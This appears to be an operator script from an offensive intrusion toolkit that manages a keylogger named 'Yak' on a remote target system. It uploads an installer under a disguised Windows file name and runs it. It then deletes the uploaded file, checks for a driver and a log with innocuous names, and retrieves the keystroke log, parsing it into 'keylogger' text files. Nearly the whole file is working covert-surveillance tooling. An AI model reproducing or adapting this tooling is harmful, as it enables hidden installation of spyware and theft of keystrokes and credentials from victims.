245 lines
7.3 KiB
PostScript
245 lines
7.3 KiB
PostScript
|
#--------------------------------------------------------
|
||
|
# File: Yak.eps
|
||
|
#
|
||
|
# Script to install/uninstall/collect Yak
|
||
|
#--------------------------------------------------------
|
||
|
@include "_FileExists.epm";
|
||
|
@include "_GenericFunctions.epm";
|
||
|
|
||
|
@echo off;
|
||
|
@case-sensitive off;
|
||
|
|
||
|
#--------------------------------------------------------
|
||
|
# Get path that EP scripts are run out of
|
||
|
#--------------------------------------------------------
|
||
|
string $ScriptsDir;
|
||
|
_GetEPScriptsPath($ScriptsDir);
|
||
|
|
||
|
int $menuOption;
|
||
|
string $localPath = "$ScriptsDir\\..\\..\\..\\tools\\yak";
|
||
|
string $yakUploadFile = "yak_min_install.exe";
|
||
|
string $localInstallPath = "$localPath\\$yakUploadFile";
|
||
|
string $localParsePath = "$localPath\\yak.exe";
|
||
|
string $fileName = "help16.exe";
|
||
|
|
||
|
#--------------------------------------------------------
|
||
|
# Get system path
|
||
|
#--------------------------------------------------------
|
||
|
string $systemPath;
|
||
|
ifnot (_GetSystemPath($systemPath)) {
|
||
|
return false;
|
||
|
}
|
||
|
|
||
|
#--------------------------------------------------------
|
||
|
# Check to see if help16.exe exists on the target (shouldn't)
|
||
|
#--------------------------------------------------------
|
||
|
if (_FileExists ($fileName, "$systemPath")) {
|
||
|
$fileName = "winhlp16.exe";
|
||
|
}
|
||
|
echo "";
|
||
|
if($argc > 1){
|
||
|
if($argv[1] == "INSTALL"){
|
||
|
return YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-is");
|
||
|
}
|
||
|
else if ($argv[1] == "UNINSTALL"){
|
||
|
return YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-u");
|
||
|
}
|
||
|
else if ($argv[1] == "VERIFY"){
|
||
|
return YakVerify($systemPath);
|
||
|
}
|
||
|
else if ($argv[1] == "COLLECT"){
|
||
|
ifnot(YakCollect($systemPath, $localParsePath)){
|
||
|
echo "Collection and parsing could not be completed, please finish manually";
|
||
|
return false;
|
||
|
}
|
||
|
}
|
||
|
else{
|
||
|
ifnot( $argv[1] == "?"){
|
||
|
echo "$argv[1] is not a valid argument";
|
||
|
}
|
||
|
YakUsage();
|
||
|
return false;
|
||
|
}
|
||
|
}
|
||
|
|
||
|
while (true) {
|
||
|
echo "- Yak";
|
||
|
|
||
|
# print the command list
|
||
|
echo "";
|
||
|
echo " (0). Exit";
|
||
|
echo " (1). Install";
|
||
|
echo " (2). Uninstall";
|
||
|
echo " (3). Verify Install/Uninstall";
|
||
|
echo " (4). Collect and Parse";
|
||
|
|
||
|
echo "";
|
||
|
$menuOption = GetInput("Enter the desired option");
|
||
|
|
||
|
if ($menuOption == 0) {
|
||
|
#--------------------------------------------------------
|
||
|
# Quit
|
||
|
#--------------------------------------------------------
|
||
|
return true;
|
||
|
|
||
|
} else if ($menuOption == 1) {
|
||
|
YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-is");
|
||
|
} else if ($menuOption == 2) {
|
||
|
YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-u");
|
||
|
} else if ($menuOption == 3) {
|
||
|
YakVerify($systemPath);
|
||
|
} else if ($menuOption == 4) {
|
||
|
ifnot(YakCollect($systemPath, $localParsePath)){
|
||
|
echo "Collection and parsing could not be completed, please finish manually";
|
||
|
}
|
||
|
} else {
|
||
|
#--------------------------------------------------------
|
||
|
# Invalid menuOption
|
||
|
#--------------------------------------------------------
|
||
|
echo "*** Invalid menuOption ***";
|
||
|
}
|
||
|
|
||
|
pause;
|
||
|
}
|
||
|
|
||
|
return false;
|
||
|
|
||
|
Sub YakUsage()
|
||
|
{
|
||
|
echo "Usage: yak [arg]";
|
||
|
echo " Runs Yak Script to perform Yak install, uninstall, verification, or collect";
|
||
|
echo "";
|
||
|
echo "Arguments:";
|
||
|
echo " [arg]";
|
||
|
echo " (optional) performs a specific Yak task and returns. ";
|
||
|
echo " (INSTALL|UNINSTALL|VERIFY|COLLECT)";
|
||
|
echo "";
|
||
|
return true;
|
||
|
}
|
||
|
|
||
|
Sub YakInstall(IN string $localInstallPath, IN string $YakUploadFile, IN string $systemPath, IN string $fileName, IN string $command)
|
||
|
{
|
||
|
echo "!!! THIS IS THE OLD VERSION OF YAK, YOU PROBABLY SHOULDN'T INSTALL IT!!!";
|
||
|
if ($command == "-is") {
|
||
|
ifnot (prompt "Are you sure you want to proceed?") {
|
||
|
return false;
|
||
|
} else {
|
||
|
echo "You didn't just actually try to do this, did you?";
|
||
|
return false;
|
||
|
}
|
||
|
}
|
||
|
bool $success = true;
|
||
|
#--------------------------------------------------------
|
||
|
# Install Yak - upload and run with -is option
|
||
|
#--------------------------------------------------------
|
||
|
echo "Uploading $YakUploadFile to $systemPath\\$fileName";
|
||
|
ifnot(`put $localInstallPath -name "$systemPath\\$fileName"`){
|
||
|
echo "Could not put $fileName into $systemPath";
|
||
|
$success = false;
|
||
|
}else{
|
||
|
echo "";
|
||
|
echo "Running $fileName on target...\n";
|
||
|
@echo on;
|
||
|
ifnot(`run -command "$systemPath\\$fileName $command" -redirect`)
|
||
|
{
|
||
|
@echo off;
|
||
|
echo "Could not run $systemPath\\$fileName $command";
|
||
|
$success = false;
|
||
|
}
|
||
|
}
|
||
|
@echo off;
|
||
|
echo "";
|
||
|
echo "Deleting $systemPath\\$fileName";
|
||
|
ifnot(`del $fileName -path $systemPath`){
|
||
|
echo "Could not delete $systemPath\\$fileName";
|
||
|
echo "Please delete it manually";
|
||
|
}
|
||
|
return $success;
|
||
|
}
|
||
|
|
||
|
Sub YakVerify(IN string $systemPath)
|
||
|
{
|
||
|
#--------------------------------------------------------
|
||
|
# Check to see if yak files exist
|
||
|
#--------------------------------------------------------
|
||
|
bool $logSuccessFlag = true;
|
||
|
bool $driverSuccessFlag = true;
|
||
|
bool $success = true;
|
||
|
if (_FileExists ("ntiopa.sys", "$systemPath")) {
|
||
|
echo "ntiopa.sys log file exists ... SUCCESSFUL";
|
||
|
} else {
|
||
|
echo "ntiopa.sys log file missing ... FAILED";
|
||
|
$logSuccessFlag = false;
|
||
|
|
||
|
echo ""; }
|
||
|
if (_FileExists ("kbpnp.sys", "$systemPath\\drivers")) {
|
||
|
echo "kbpnp.sys driver exists ... SUCCESSFUL";
|
||
|
} else {
|
||
|
echo "kbpnp.sys driver missing ... FAILED";
|
||
|
$driverSuccessFlag = false;
|
||
|
}
|
||
|
|
||
|
echo "";
|
||
|
if (($logSuccessFlag == true) && ($driverSuccessFlag == true)) {
|
||
|
echo "YAK properlly installed on target";
|
||
|
} else if ((($logSuccessFlag == true) && ($driverSuccessFlag == false)) ||
|
||
|
(($logSuccessFlag == false) && ($driverSuccessFlag == true))) {
|
||
|
echo "YAK is in a bad state...need a reboot before it's functional";
|
||
|
$success = false;
|
||
|
} else {
|
||
|
echo "YAK doesn't exist on target!";
|
||
|
$success = false;
|
||
|
}
|
||
|
return $success;
|
||
|
}
|
||
|
|
||
|
Sub YakCollect(IN string $systemPath, IN string $localParsePath)
|
||
|
{
|
||
|
bool $success = true;
|
||
|
#--------------------------------------------------------
|
||
|
# Download Yak and Parse the local file
|
||
|
#--------------------------------------------------------
|
||
|
echo "Getting $systemPath\\ntiopa.sys...";
|
||
|
echo "";
|
||
|
@record on;
|
||
|
ifnot(`copyget "$systemPath\\ntiopa.sys"`){
|
||
|
echo "Could not copyget $systemPath\\ntiopa.sys";
|
||
|
@record off;
|
||
|
return false;
|
||
|
}
|
||
|
@record off;
|
||
|
string $localName = GetCmdData("LocalName");
|
||
|
|
||
|
string $temp = split("_", $localName);
|
||
|
int $counter = 1;
|
||
|
string $fileDate = "";
|
||
|
while ($counter < sizeOf($temp)) {
|
||
|
$fileDate = "$fileDate\_$temp[$counter]";
|
||
|
$counter++;
|
||
|
}
|
||
|
|
||
|
echo "";
|
||
|
echo "Moving file to NOSEND directory...";
|
||
|
`local mkdir Get_Files\\NOSEND`;
|
||
|
ifnot(`local move Get_Files\\$localName Get_Files\\NOSEND\\$localName`){
|
||
|
echo "Could not move Get_Files\\$localName into Get_Files\\NOSEND\\$localName";
|
||
|
return false;
|
||
|
}
|
||
|
echo "";
|
||
|
echo "Parsing file...";
|
||
|
|
||
|
ifnot(`local run -command "$localParsePath -tu -i Get_Files\\NOSEND\\$localName -o Get_Files\\NOSEND\\keylogger$fileDate.txt"`){
|
||
|
echo "Could not run $localParsePath -tu -i";
|
||
|
$success = false;
|
||
|
}
|
||
|
ifnot(`local run -command "$localParsePath -tau -i Get_Files\\NOSEND\\$localName -o Get_Files\\NOSEND\\keylogger_scancodes$fileDate.txt"`){
|
||
|
echo "Could not run $localParsePath -tau -i";
|
||
|
$success = false;
|
||
|
}
|
||
|
|
||
|
sleep 3000;
|
||
|
@echo on;
|
||
|
`local dir *$fileDate* -path "Get_Files\\NOSEND"`;
|
||
|
@echo off;
|
||
|
return $success;
|
||
|
}
|